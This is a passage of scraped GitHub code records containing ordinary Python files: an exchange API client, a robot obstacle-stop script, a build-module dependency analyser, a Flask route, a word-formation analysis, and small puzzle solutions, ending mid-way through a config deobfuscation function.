https://www.jetbrains.com/help/pycharm/\n","repo_name":"dnielben/libcomplejos","sub_path":"libcomplex.py","file_name":"libcomplex.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14838520151","text":"from infrastructure.built_in.adapter.request import post_data, open_url\nfrom private.details import (\n get_app_key,\n get_cert,\n get_exchange_url,\n get_account_url,\n get_login_url,\n get_user_details,\n get_account_str,\n)\n\n\nclass ExternalAPIHandler:\n def __init__(self, environment=\"Prod\"):\n self.environment = environment\n self._app_key = None\n self._token = None\n self._headers = None\n\n def get_headers(self):\n return 
self._headers\n\n def get_account_status(self):\n\n account_status = self._call_account()\n\n return account_status\n\n def set_headers(self):\n self._app_key = get_app_key(environment=self.environment)\n data = self._login()\n self._token = self._get_token(data=data)\n if self._has_token():\n self._headers = self._make_headers()\n return 1\n\n return 0\n\n def _call_account(self):\n response = self._call_api(\n url=get_account_url(),\n request='{\"jsonrpc\": \"2.0\", \"method\": \"%s\"}' % get_account_str(),\n )\n account_status = self._try_get_data(data=response)\n return account_status\n\n def _call_exchange(self, request):\n response = self._call_api(url=get_exchange_url(), request=request)\n data = self._try_get_data(data=response, name=\"result\")\n return data\n\n def _post_instructions(self, request):\n response = self._call_api(url=get_exchange_url(), request=request)\n data = self._try_get_data(data=response, name=\"instructionReports\") or []\n return data\n\n def _call_api(self, url, request):\n response = open_url(url=url, request=request, headers=self.get_headers())\n return response\n\n def _try_get_data(self, data, name=\"result\"):\n try:\n result = data.get(name)\n except:\n result = None\n return result\n\n def _login(self):\n response = post_data(\n url=get_login_url(),\n data=get_user_details(),\n cert=get_cert(),\n headers={\n \"X-Application\": self._app_key,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n },\n )\n return response\n\n def _get_token(self, data):\n return data.get(\"sessionToken\")\n\n def _has_token(self):\n return self._token is not None\n\n def _make_headers(self):\n return {\n \"X-Application\": self._app_key,\n \"X-Authentication\": self._token,\n \"content-type\": \"application/json\",\n }\n","repo_name":"mattseddon/billy_cart","sub_path":"infrastructure/external_api/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4496535388","text":"from easygopigo import *\nfrom gopigo import *\nfrom time import sleep\nimport atexit\n\n@atexit.register\n# this will be called if the program is killed via \n# a Ctrl-C on the keyboard or any other reason\ndef cleanup():\n\tstop()\n\t\n\t\n# Let's start the GoPiGo. \n# this command only needs to be given once \n# GoPiGo will keep going forward until told to stop\nprint(\"Going forward\")\nforward()\n\n# let's name our ultrasonic sensor\nmy_ultrasonic = UltraSonicSensor(\"A1\")\n\n# Note the absence of Wait code, or time.sleep in Python\n# As GoPiGo is not using broadcast events in Python\n# there's no need to space the queries out\n# It's possible to loop as quickly as possible\n# and get precise behavior.\nprint(\"To stop the forever loop, use Ctrl-C on the keyboard\")\nwhile True:\n\tdist = my_ultrasonic.read()\n\n\t# in case of error the above function can return a value of -1\n\t# there's a danger here if we simply check for less than 40 cm\n\tif dist > 0 and dist < 40:\n\t\tprint(\"Object too close. Stopping!\")\n\t\tstop()\n\t\tbreak # this break forces the while loop to quit\n\n","repo_name":"DexterInd/GoBox","sub_path":"Mission_12_Materials/m05_stopForObstacle.py","file_name":"m05_stopForObstacle.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37188952869","text":"#! 
/usr/bin/env python3\n\"\"\" Tool for handling of Sprint modules \"\"\"\n\n__version__ = \"$Id$\"\n__author__ = \"rybach@i6.informatik.rwth-aachen.de\"\n\nimport sys, os, copy\nimport optparse\nimport pickle\nimport re\nfrom modules import parseModulesMake\nDEBUG = False\n\nIGNORE_DIRS = [\"Tools\", \"Translation\", \".svn\", \".build\", \"doc\",\n \"development\", \"Flac\", \"Test\" ]\nIGNORE_FILES = [ \"check.cc\", \"check-xml.cc\" ]\nIGNORE_DEP = [ (\"Audio\", \"Wav\") ]\nDIR_MODULES = { \"Nn\": \"MODULE_NN\",\n \"Flf\": \"MODULE_FLF\",\n \"Flf/FlfCore\": \"MODULE_FLF_CORE\",\n \"Flf/FlfExt\": \"MODULE_FLF_EXT\",\n \"Math/Nr\": \"MODULE_MATH_NR\",\n \"Search/Wfst\": \"MODULE_SEARCH_WFST\",\n \"Search/AdvancedTreeSearch\": \"MODULE_ADVANCED_TREE_SEARCH\",\n \"OpenFst\": \"MODULE_OPENFST\",\n \"Test\": \"MODULE_TEST\"\n }\n\"\"\" modules without actual files, used to enable/disable\ncertain functionality \"\"\"\nPSEUDO_MODULES = [ \"MODULE_TBB\",\n \"MODULE_OPENMP\",\n \"MODULE_INTEL_MKL\",\n \"MODULE_ACML\",\n \"MODULE_CUDA\"\n ]\n\n\"\"\" mapping from special include files to required modules \"\"\"\nDEFAULT_DEPS = { '<omp.h>' : \"MODULE_OPENMP\",\n '<acml.h>' : \"MODULE_ACML\",\n '\"mkl.h\"' : \"MODULE_INTEL_MKL\",\n '<cublas_v2.h>' : \"MODULE_CUDA\",\n '<cuda_runtime.h>' : \"MODULE_CUDA\",\n '<tbb/parallel_for.h>' : \"MODULE_TBB\"\n }\n\nINCLUDE_EXT = [ \".hh\", \".cc\", \".h\", \".tcc\", \".c\" ]\n\ndef debug(msg):\n if DEBUG:\n sys.stderr.write(\"DEBUG: %s\\n\" % str(msg))\n\n\ndef findFiles():\n \"\"\"find all relevant source files\"\"\"\n fileList = []\n makefiles = []\n # ignore files with 2 or more dots in the filename\n ignoreRe = re.compile(\"([^/]+\\.[^/]*\\.[^/]+)$\")\n for root, dirs, files in os.walk(\"src\"):\n debug(\"root=%s dirs=%s\" % (str(root), str(dirs)))\n for dir in IGNORE_DIRS:\n if dir in dirs:\n dirs.remove(dir)\n debug(\"ignore %s\" % dir)\n if root != \"src\" and root[-3:] != \"doc\":\n for f in files:\n ext = f[f.rfind(\".\"):]\n pathName = root[4:]\n if ext in INCLUDE_EXT and not f in IGNORE_FILES and \\\n not ignoreRe.match(f):\n id = len(fileList)\n fileList.append( (pathName, f) )\n elif (f == \"Makefile\"):\n debug(\"found makefile: %s %s\" % (pathName, f))\n makefiles.append( (pathName, f) )\n return fileList, makefiles\n\n\ndef getEntities(files):\n \"\"\"create entity ids for a list of filenames\"\"\"\n entitities = []\n entityDict = {}\n for p, f in files:\n name = f[:f.rfind(\".\")]\n entity = (p, name)\n if not entity in entityDict:\n entityDict[entity] = len(entitities)\n entitities.append(entity)\n for m in PSEUDO_MODULES:\n entity = (\"#\", m)\n if not entity in entityDict:\n entityDict[entity] = len(entitities)\n entitities.append(entity)\n return entitities, entityDict\n\n\nclass Modules:\n \"\"\"handles module to file relationships.\n parses all makefiles to get the module\n membership information\n \"\"\"\n def __init__(self, entityDict):\n self.entityDict = entityDict\n self.moduleFiles = []\n self.moduleNames = []\n self.moduleId = {}\n self.entityToModules = []\n self.autoNames = set()\n\n def parseMakefiles(self, makefiles):\n \"\"\"read all makefiles and create the set of entities\n for each discovered module\n \"\"\"\n for p, n in makefiles:\n filename = os.path.join(\"src\", p, n)\n self._parseFile(p, filename)\n\n def addDefaultModules(self, entities):\n \"\"\"add entities, which are not part of a pre-defined\n module to a default module MODULE_<DIRNAME>\n \"\"\"\n self._setupEntityToModules()\n for e in 
range(len(self.entityDict)):\n path, name = entities[e]\n if self.entityToModules[e] is None:\n isDefaultName = False\n if path in DIR_MODULES:\n moduleName = DIR_MODULES[path]\n elif path == \"#\":\n moduleName = name\n else:\n moduleName = \"MODULE_\" + path.upper().replace(\"/\", \"_\")\n isDefaultName = True\n m = self._addToModule(moduleName, e)\n self.entityToModules[e] = m\n if isDefaultName: self.autoNames.add(m)\n debug(\"default: %d -> %s, %d\" % (e, self.moduleNames[m], isDefaultName))\n for m in DIR_MODULES.values():\n self._addModule(m)\n\n def _setupEntityToModules(self):\n for e in range(len(self.entityDict)):\n self.entityToModules.append(None)\n ignore = [ self.entityDict[e] for e in IGNORE_DEP ]\n for m in range(len(self.moduleFiles)):\n for e in self.moduleFiles[m]:\n if e in ignore: continue\n if not self.entityToModules[e]:\n self.entityToModules[e] = m\n debug(\"e2m: %d -> %s\" % (e, self.moduleNames[m]))\n else:\n if self.entityToModules[e] != m:\n raise Exception(\"%s != %s\" % (self.moduleNames[m],\n self.moduleNames[self.entityToModules[e]]))\n\n def _parseFile(self, dir, filename):\n debug(\"parsing %s\" % filename)\n l = 0\n curMod = []\n for line in open(filename, \"rt\"):\n l += 1\n line = line.strip()\n if not line: continue\n aline = line.split()\n if aline[0] == \"ifdef\":\n if curMod:\n sys.stderr.write(\"ambigous definition in %s:%d\\n\" % (filename, l))\n sys.stderr.write(\"curMod=%s\\n\" % \" \".join(curMod))\n sys.stderr.write(line + \"\\n\")\n curMod.append(aline[1])\n elif aline[0] == \"endif\":\n if curMod: curMod.pop()\n else:\n if curMod:\n try:\n e = self._getEntity(aline, dir)\n except KeyError as e:\n sys.stderr.write(\"Warning: unknown file in line '%s' (%s:%d)\\n\" %\n (line, filename, l))\n e = -1\n if e >= 0:\n assignedModule = self._addToModule(curMod[0], e)\n debug(\"%d -> %s\" % (e, self.moduleNames[assignedModule]))\n else:\n debug(\"unknown entity in %s: %s\" % (filename, str(aline)))\n\n def _getEntity(self, line, dir):\n curFile = \"\"\n curDir = dir\n if len(line) > 1 and line[1] == '+=':\n target = line[0].split(\"_\")\n if target[-1] == \"O\" and target[0] != \"CHECK\" and \\\n not \"libSprint\" in line[2]:\n curFile = \"/\".join(line[2].split(\"/\")[1:])\n elif line[0] == \"#MODF\":\n curFile = line[1]\n result = -1\n if curFile:\n entity = (curDir, curFile.split(\".\")[0])\n debug(str(entity))\n result = self.entityDict[entity]\n return result\n\n def _addModule(self, module):\n if not module in self.moduleId:\n id = len(self.moduleId)\n self.moduleId[module] = id\n self.moduleNames.append(module)\n self.moduleFiles.append([])\n else:\n id = self.moduleId[module]\n return id\n\n def _addToModule(self, module, entity):\n id = self._addModule(module)\n self.moduleFiles[id].append(entity)\n return id\n\n def toStrings(self, modules):\n \"\"\"list of module ids to list of module names\"\"\"\n r = [ self.moduleNames[m] for m in modules ]\n r.sort()\n return r\n\n def toString(self, module):\n \"\"\"module id to module name\"\"\"\n return self.moduleNames[module]\n\n\n\nclass Dependencies:\n \"\"\"handles file dependencies.\n parses all source files to check for included\n header files.\n \"\"\"\n def __init__(self, modules, entities):\n self.modules = modules\n self.entities = entities\n self.dependencies = {}\n self.connections = {}\n self.fileDependencies = {}\n for m in range(len(modules.moduleNames)):\n self.dependencies[m] = [set(), set()]\n\n def parseFiles(self, entityDict):\n \"\"\"parse all source files for all entities in 
entityDict\"\"\"\n for name, id in entityDict.items():\n filename = \"src/%s/%s\" % name\n includes = []\n for ext in INCLUDE_EXT:\n if os.path.isfile(filename + ext):\n includes += self._parseFile(filename + ext)\n entities = self._getEntities(entityDict, name, includes)\n self._addDependencies(id, entities)\n\n def getFileDependencies(self, e):\n \"\"\"returns direct and indirect module dependencies of the given entity.\"\"\"\n deps = set()\n for m in self.fileDependencies[e]:\n deps.add(m)\n deps.update(self.dependencies[m][0])\n return self.fileDependencies[e], deps.difference(self.modules.autoNames)\n\n def _addDependencies(self, e, includes):\n module = self.modules.entityToModules[e]\n debug(\"module: %d %s\" % (module, self.modules.moduleNames[module]))\n for i, cond in includes:\n c = int(cond)\n depModule = self.modules.entityToModules[i]\n debug(\"depends: %d %s cond=%d\" % (depModule, self.modules.moduleNames[depModule], c))\n self.dependencies[module][c].add(depModule)\n if not e in self.fileDependencies:\n self.fileDependencies[e] = set()\n self.fileDependencies[e].add(depModule)\n self._addConnection(module, depModule, e, None)\n\n def _addConnection(self, modFrom, modTo, entity, module):\n if not modFrom in self.connections:\n self.connections[modFrom] = {modFrom: []}\n if not modTo in self.connections[modFrom]:\n self.connections[modFrom][modTo] = []\n self.connections[modFrom][modTo].append((entity, module))\n\n def getConnection(self, modFrom, modTo):\n \"\"\"returns the entities that cause the dependency\n between the two given modules.\"\"\"\n try:\n item = self.connections[modFrom][modTo]\n except KeyError:\n return None\n ret = []\n for i in item:\n if i[0] is None:\n ret.append(self.modules.moduleNames[i[1]])\n else:\n ret.append(self.entities[i[0]])\n return ret\n\n def _stripExt(self, f):\n return re.sub(\"\\.hh?$\", \"\", f)\n\n def _getEntities(self, entityDict, file, includes):\n eIncludes = []\n for name, con in includes:\n n = None\n debug(\"name: \" + name)\n if name in DEFAULT_DEPS:\n n = (\"#\", DEFAULT_DEPS[name])\n elif name[0] == '\"':\n a = (file[0] + \"/\" + name[1:-1]).split(\"/\")\n n = (\"/\".join(a[:-1]), self._stripExt(a[-1]))\n elif name.find(\"/\"):\n a = name[1:-1].split(\"/\")\n n = (\"/\".join(a[:-1]), self._stripExt(a[-1]))\n else:\n debug(\"ignored include: \" + name)\n if n:\n debug(\"n: \" + str(n))\n # remove .hh/.h\n n[1] .replace(\".hh\", \"\").replace(\".h\", \"\")\n if n in entityDict:\n debug(\"%s %d con=%d\" % (str(n), entityDict[n], con))\n eIncludes.append((entityDict[n], con))\n else:\n debug(\"unknown include: \" + str(n))\n return eIncludes\n\n def _parseFile(self, filename):\n includes = []\n condStack = [ False ]\n debug(\"parsing \" + filename)\n for line in open(filename, \"rt\", encoding=\"utf-8\"):\n line = line.strip()\n if not line or line[0] != '#': continue\n sline = line.split()\n if sline[0][:3] == \"#if\":\n pos = line.find(\"MODULE_\")\n if pos >= 0 and line[pos-1:pos+9] != \"_MODULE_HH\":\n condStack.append(True)\n else:\n condStack.append(condStack[-1])\n elif sline[0] == \"#endif\":\n condStack.pop()\n elif sline[0] == \"#include\":\n includes.append((sline[1], condStack[-1]))\n return includes\n\n def buildClosure(self):\n \"\"\"build the dependency closure for all known modules.\n resolves the indirect dependencies of all modules.\n updates self.dependencies.\n \"\"\"\n self.finished = [ False ] * len(self.dependencies)\n for m in self.dependencies.keys():\n trace = [m]\n deps = self._close(trace, m)\n 
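# Hedged standalone sketch of what _close() below computes: the transitive\n            # closure of a direct-dependency graph via depth-first traversal.\n            #   def close(graph, node, seen=None):\n            #       seen = set() if seen is None else seen\n            #       for dep in graph.get(node, ()):\n            #           if dep not in seen:\n            #               seen.add(dep)\n            #               close(graph, dep, seen)\n            #       return seen\n            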
assert(self.dependencies[m][0] == deps)\n        del self.finished\n\n    def _close(self, trace, module):\n        if self.finished[module]:\n            return self.dependencies[module][0]\n        deps = copy.copy(self.dependencies[module][0])\n        for m in self.dependencies[module][0]:\n            if not m in trace:\n                c = self._close(trace + [m], m)\n                deps.update(c)\n                for conn in c:\n                    self._addConnection(module, conn, None, m)\n        self.dependencies[module][0] = deps\n        self.finished[module] = True\n        return deps\n\n    def removeDefaultModules(self):\n        \"\"\"removes the automatically generated modules from the\n        dependency sets.\n        \"\"\"\n        for m in self.dependencies:\n            self.dependencies[m][0] = self.dependencies[m][0].difference(self.modules.autoNames)\n            if m in self.dependencies[m][0]: self.dependencies[m][0].remove(m)\n\n    def factorized(self, module, cond):\n        \"\"\"returns the factorized set of module dependencies for\n        the given module.\n        removes module dependencies if they are implied by another\n        dependent module.\n        \"\"\"\n        newdeps = set()\n        todo = copy.copy(self.dependencies[module][cond])\n        while todo:\n            best = -1\n            bestm = -1\n            for m in todo:\n                if m == module: continue\n                intersection = len(todo.intersection(self.dependencies[m][cond]))\n                if intersection > best:\n                    best = intersection\n                    bestm = m\n            assert(bestm != -1)\n            newdeps.add(bestm)\n            todo.difference_update(self.dependencies[bestm][cond])\n            if best == 0:\n                newdeps.update(todo)\n                break\n        return newdeps\n\n\ndef checkDependencies(db, enabled, disabled):\n    \"\"\"check if all dependencies are met in the given\n    set of enabled modules.\n    \"\"\"\n    enabledModules = set()\n    for m in enabled:\n        try:\n            enabledModules.add(db.getModuleId(m))\n        except KeyError:\n            print(\"Warning: Unknown module \\\"%s\\\"\" % m)\n    retval = 0\n    for mid in enabledModules:\n        debug(\"module %s %d\" % (db.getModuleName(mid), mid))\n        depModules = db.deps.dependencies[mid][0]\n        if not depModules.issubset(enabledModules):\n            print(\"unmet dependencies for module \", db.getModuleName(mid))\n            for d in depModules:\n                if not d in enabledModules:\n                    print(\"  %s requires %s\" % (db.getModuleName(mid), db.getModuleName(d)))\n            retval = 1\n    return retval\n\n\nclass Database:\n    \"\"\"creates, loads, stores the Modules and the\n    Dependencies object.\n    \"\"\"\n    def __init__(self):\n        self.modules = None\n        self.entities = None\n        self.entityDict = None\n        self.deps = None\n\n    def write(self, filename):\n        fp = open(filename, \"wb\")\n        pickle.dump(self, fp, 2)\n\n    def load(self, filename):\n        try:\n            fp = open(filename, \"rb\")\n            tmp = pickle.load(fp)\n        except Exception as e:\n            sys.stderr.write(\"db load error: %s\\n\" % str(e))\n            return False\n        self.modules = tmp.modules\n        self.entities = tmp.entities\n        self.entityDict = tmp.entityDict\n        self.deps = tmp.deps\n        return True\n\n    def create(self, files, makefiles):\n        self.entities, self.entityDict = getEntities(files)\n        self.modules = Modules(self.entityDict)\n        self.modules.parseMakefiles(makefiles)\n        self.modules.addDefaultModules(self.entities)\n        self.deps = Dependencies(self.modules, self.entities)\n        self.deps.parseFiles(self.entityDict)\n        self.deps.buildClosure()\n        self.deps.removeDefaultModules()\n\n    def getFileId(self, filename):\n        a = filename.replace(\"src/\", \"\").split(\"/\")\n        n = (\"/\".join(a[:-1]), a[-1][:-3])\n        return self.entityDict[n]\n\n    def getEntity(self, fileid):\n        return self.entities[fileid]\n\n    def getEntities(self, fileids):\n        return [ self.entities[id] for id in fileids ]\n\n    def getModuleId(self, module):\n        return self.modules.moduleId[module]\n\n    def 
getModuleName(self, moduleId):\n        return self.modules.moduleNames[moduleId]\n\n\ndef main(options, args):\n    db = Database()\n    if options.load:\n        sys.stderr.write(\"loading database %s\\n\" % options.database)\n        ok = db.load(options.database)\n        if not ok:\n            return 1\n    else:\n        os.chdir(options.basedir)\n        files, makefiles = findFiles()\n        sys.stderr.write(\"%d files, %d makefiles\\n\" % (len(files), len(makefiles)))\n        db.create(files, makefiles)\n        if options.write:\n            sys.stderr.write(\"storing database %s\\n\" % options.database)\n            db.write(options.database)\n\n    if options.show:\n        mids = sorted(db.deps.dependencies.keys(), key=lambda i: db.modules.toString(i))\n        for m in mids:\n            d = db.deps.dependencies[m]\n            if not (d[0] or d[1]): continue\n            print(db.modules.toString(m))\n            if options.factorize:\n                moduleDep = db.deps.factorized(m, 0)\n                condModuleDep = db.deps.factorized(m, 1)\n            else:\n                moduleDep = d[0]\n                condModuleDep = d[1]\n            print(\"depends on:\", db.modules.toStrings(moduleDep))\n            print(\"cond. depends on:\", db.modules.toStrings(condModuleDep))\n            print(\"\")\n    if options.depfile:\n        id = db.getFileId(options.depfile)\n        direct, indirect = db.deps.getFileDependencies(id)\n        print(id, db.getEntity(id))\n        print(\"direct: \", db.modules.toStrings(direct))\n        print(\"indirect: \", db.modules.toStrings(indirect))\n    if options.connection:\n        m1, m2 = options.connection.split(\",\")\n        m1 = db.getModuleId(m1)\n        m2 = db.getModuleId(m2)\n        print(db.getModuleName(m1), \"->\", db.getModuleName(m2))\n        print(db.deps.getConnection(m1, m2))\n    if options.moduledep:\n        mid = db.getModuleId(options.moduledep)\n        print(mid, db.getModuleName(mid))\n        if options.factorize:\n            moduleDep = db.deps.factorized(mid, 0)\n            condModuleDep = db.deps.factorized(mid, 1)\n        else:\n            moduleDep, condModuleDep = db.deps.dependencies[mid]\n        print(\"depends on: \", db.modules.toStrings(moduleDep))\n        print(\"cond. 
depends on: \", db.modules.toStrings(condModuleDep))\n if options.files:\n mid = db.getModuleId(options.files)\n print(mid, db.getModuleName(mid))\n print(db.getEntities( db.modules.moduleFiles[mid] ))\n if options.check:\n disabled, enabled = parseModulesMake(options.modulesMake)\n return checkDependencies(db, enabled, disabled)\n return 0\n\n\nif __name__ == \"__main__\":\n optparser = optparse.OptionParser(usage = \"%prog [OPTIONS]\")\n optparser.add_option(\"-k\", \"--modules-file\", help=\"Modules.make\", default=\"Modules.make\",\n dest=\"modulesMake\")\n optparser.add_option(\"-a\", \"--database\", help=\"database file\", default=\"deps.db\",\n dest=\"database\")\n optparser.add_option(\"-l\", \"--load\", help=\"load database\", default=False, action=\"store_true\",\n dest=\"load\")\n optparser.add_option(\"-w\", \"--write\", help=\"store database\", default=False, action=\"store_true\",\n dest=\"write\")\n optparser.add_option(\"-s\", \"--show\", help=\"show all dependencies\", default=False, action=\"store_true\",\n dest=\"show\")\n optparser.add_option(\"-d\", \"--dependencies\", help=\"dependencies of a file\", default=None,\n dest=\"depfile\")\n optparser.add_option(\"-c\", \"--connection\", help=\"dependencies between 2 modules\", default=None,\n dest=\"connection\")\n optparser.add_option(\"-m\", \"--module\", help=\"module dependencies\", default=None,\n dest=\"moduledep\")\n optparser.add_option(\"-t\", \"--factorize\", help=\"factorize dependencies\", default=False, action=\"store_true\",\n dest=\"factorize\")\n optparser.add_option(\"-f\", \"--files\", help=\"show files of a module\", default=None,\n dest=\"files\")\n optparser.add_option(\"-e\", \"--check\", help=\"check if module dependencies are fulfilled \"\n \"with the modules enabled in Modules.make\",\n action=\"store_true\", default=False, dest=\"check\")\n optparser.add_option(\"-b\", \"--basedir\", help=\"package root directory\",\n default=\".\", dest=\"basedir\")\n\n options, args = optparser.parse_args()\n r = main(options, args)\n sys.exit(r)\n\n","repo_name":"rwth-i6/rasr","sub_path":"scripts/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":21997,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"54"} +{"seq_id":"40686587710","text":"\"\"\"users routes\"\"\"\nfrom flask import current_app as app, jsonify, request\nfrom models import Trial, BaseObject, db\nfrom collections import OrderedDict\nimport numpy as np\nimport json\nimport glob\n\n\n@app.route('/trial/<user_id>/<trial_no>', methods=['GET'])\n\ndef get_trial(user_id,trial_no):\n\n query = Trial.query.filter(Trial.UserNo==user_id, Trial.TrialNo==trial_no)\n if query is not None:\n print('Exists')\n \n block = query.first_or_404()\n\n # format the query into a dictionary first:\n\t\n result = {}\n arr_id = block.get_id().replace(' ',' ').split(' ')\n result['id'] = arr_id[0]\n \n arr_task_id = block.get_task_id().replace(' ',' ').split(' ')\n result['taskID'] = arr_task_id[0]\n \n arr_user_no = block.get_user_no().replace(' ',' ').split(' ')\n result['userNo'] = arr_user_no[0]\n \n arr_item_no = block.get_item_no().replace(' ',' ').split(' ')\n result['itemNo'] = arr_item_no[0]\n \n arr_horizon = block.get_horizon().replace(' ',' ').split(' ')\n result['horizon'] = arr_horizon[0]\n \n arr_block_no = block.get_block_no().replace(' ',' ').split(' ')\n result['blockNo'] = arr_block_no[0]\n \n arr_trial_no = block.get_trial_no().replace(' ',' ').split(' ')\n result['trialNo'] = 
arr_trial_no[0]\n \n arr_sample_nb = block.get_sample_nb().replace(' ',' ').split(' ')\n result['sampleNb'] = arr_sample_nb[0]\n\n\n app.logger.info(result)\n return jsonify(result), 200 ","repo_name":"MagDub/MFweb-api","sub_path":"routes/old/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42310583680","text":"from sklearn.model_selection import KFold\nimport Parser\nfrom itertools import product\nimport numpy as np\n\n\nclass WwmAnalysis:\n def __init__(self):\n self.parsers = list()\n self.correct_list = list()\n self.number_of_words_in_fold = list()\n self.accuracies = list()\n self.compare = set()\n\n def run_analysis(self, params=None, folds=6):\n with open(\"../list-files/bnc_word_list.txt\", \"r\") as f:\n self.compare = set(f.readlines())\n\n p = Parser.Parser(\"../list-files/MobyDickList.txt\")\n\n lex = p.lexicon\n np_lex = np.array(lex)\n\n k_fold = KFold(folds, True)\n\n bnc_tagset = [\"AJ0\", \"AJC\", \"AJS\", \"NN1\", \"NN2\", \"VVB\", \"VVD\", \"VVG\", \"VVI\", \"VVN\", \"VVZ\"]\n upenn_tagset = [\"JJ\", \"JJR\", \"JJS\", \"NN\", \"NNS\", \"VB\", \"VBD\", \"VBG\", \"VBP\", \"VBN\", \"VBZ\"]\n upenn_to_bnc = {k: v for k, v in zip(upenn_tagset, bnc_tagset)}\n\n self.parsers = list()\n self.correct_list = list()\n self.number_of_words_in_fold = list()\n self.accuracies = list()\n\n for check, test in k_fold.split(np_lex):\n p = Parser.Parser()\n p.lexicon = [(x, y) for x, y in np_lex[test]]\n\n self.number_of_words_in_fold.append(len(p.lexicon))\n p.params.update(params)\n\n p.wwm()\n\n correct = list()\n count_total = len(lex)\n\n for word in p.generated_new_words:\n if \"{},{}\\n\".format(word[0], upenn_to_bnc[word[1]]) in self.compare:\n correct.append(word)\n\n self.parsers.append(p)\n self.correct_list.append(correct)\n\n def print_stats(self):\n for i in range(len(self.parsers)):\n print(\"number of words in fold: \" + str(self.number_of_words_in_fold[i]))\n print(\"number of strategies discovered: \" + str(len(self.parsers[i].strategies)))\n print(\"number of new words: \" + str(len(self.parsers[i].generated_new_words)))\n print(\"number of correct words: \" + str(len(self.correct_list[i])))\n print(\"number of total comparison words: \" + str(len(self.compare)))\n if len(self.parsers[i].generated_new_words) != 0:\n acc = len(self.correct_list[i]) / len(self.parsers[i].generated_new_words)\n else:\n acc = 0\n print(\"accuracy: \" + str(acc))\n\n def get_accuracies(self):\n self.accuracies = list()\n for i in range(len(self.parsers)):\n if len(self.parsers[i].generated_new_words) != 0:\n acc = len(self.correct_list[i]) / len(self.parsers[i].generated_new_words)\n else:\n acc = 0\n self.accuracies.append(acc)\n return self.accuracies\n\n def get_avg_accuracy(self):\n accs = self.get_accuracies()\n return sum(accs)/len(accs)\n\n def get_avg_strategy_count(self):\n strat_counts = list()\n for p in self.parsers:\n strat_counts.append(len(p.strategies))\n return sum(strat_counts) / len(strat_counts)\n\n def find_parameters(self):\n begin_sequence_overlap = list(range(2, 3))\n end_sequence_overlap = list(range(3,4))\n comparison_threshold = list(range(15, 18, 1))\n editdistance_threshold = list(range(4, 5))\n\n params_possible_values = [begin_sequence_overlap, end_sequence_overlap,\n comparison_threshold, editdistance_threshold]\n\n param_names = [\"begin_sequence_overlap\", \"end_sequence_overlap\", \"comparison_threshold\", 
\"editdistance_threshold\"]\n\n param_list = [list(zip(param_names, p)) for p in list(product(*params_possible_values))]\n\n data = list()\n print(len(param_list))\n\n for params in [{k: v for k,v in param_vals} for param_vals in param_list]:\n print(\"====================================================\")\n print(params)\n an = WwmAnalysis()\n an.run_analysis(params)\n\n print(\"accuracies list: \" + str(an.get_accuracies()))\n print(\"avg accuracy: \" + str(an.get_avg_accuracy()))\n print(\"avg strategy count: \" + str(an.get_avg_strategy_count()))\n\n data.append((params, an.get_accuracies(), an.get_avg_accuracy(), an.get_avg_strategy_count()))\n\n with open(\"analysis_data_3.txt\", \"w\", encoding=\"utf-8\") as f:\n for d in data:\n f.write(\"{}\\t{}\\t{}\\t{}\\n\".format(d[2], d[3], d[1], d[0]))\n\n\nif __name__ == \"__main__\":\n params = {\n \"begin_sequence_overlap\": 2,\n \"end_sequence_overlap\": 3,\n \"comparison_threshold\": 48,\n \"editdistance_threshold\": 4\n }\n\n analysis = WwmAnalysis()\n analysis.run_analysis(params=params, folds=2)\n\n analysis.print_stats()\n\n print(str(analysis.get_avg_accuracy()))\n\n # analysis.find_parameters()\n\n","repo_name":"maugl/wwm","sub_path":"analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10184099360","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/9/18 下午10:26\n# @Author : jaelyn\n# @FileName: 821.py\n# @Software: PyCharm\n\nclass Solution(object):\n def shortestToChar(self, S, C):\n \"\"\"\n :type S: str\n :type C: str\n :rtype: List[int]\n \"\"\"\n ans_list = []\n for i in range(len(S)):\n left, right = S[i - len(S)::-1].find(C), S[i:].find(C)\n if left == -1:\n left = 10000\n if right == -1:\n right = 10000\n ans_list.append(min(left, right))\n return ans_list\n # ans_list = []\n # for index, s_c in enumerate(S.split(C)):\n # if index == 0:\n # for i in range(len(s_c)):\n # ans_list.append((len(s_c)-i))\n # elif index == len(s_c)-1:\n # pass\n # else:\n # for i in range(len(s_c)//2):\n # ans_list.append(i+1)\n # if len(s_c) % 2 != 0:\n # ans_list.append(len(s_c)//2+1)\n # for i in range(len(s_c)//2):\n # ans_list.append((len(s_c)//2)-i)\n # ans_list.append(0)\n # print(index, s_c)\n # ans_list.pop()\n # return ans_list\n\n\nif __name__ == '__main__':\n solution = Solution()\n S = \"abaa\"\n C = 'b'\n ret = solution.shortestToChar(S, C)\n print(ret)","repo_name":"Jaelyn-Lim/leetcode","sub_path":"2018-9/821.py","file_name":"821.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29235521197","text":"\ndef is_prime(n, primes):\n for p in primes:\n if n % p == 0:\n return False\n return True\n\ni = 2\nprimes = []\nwhile True:\n if len(primes) >= 10001:\n break\n if is_prime(i, primes):\n primes.append(i)\n i += 1\nprint(primes[10000])\n","repo_name":"maxtrussell/project-euler","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28700980604","text":"# 'data' holds the content of the obfuscated configuration file\nimport sys\ndef deobfuscate(data):\n r = []\n for c in data:\n c = ord(c)\n c = (c + ord('y')) & 0xff\n c = (c ^ 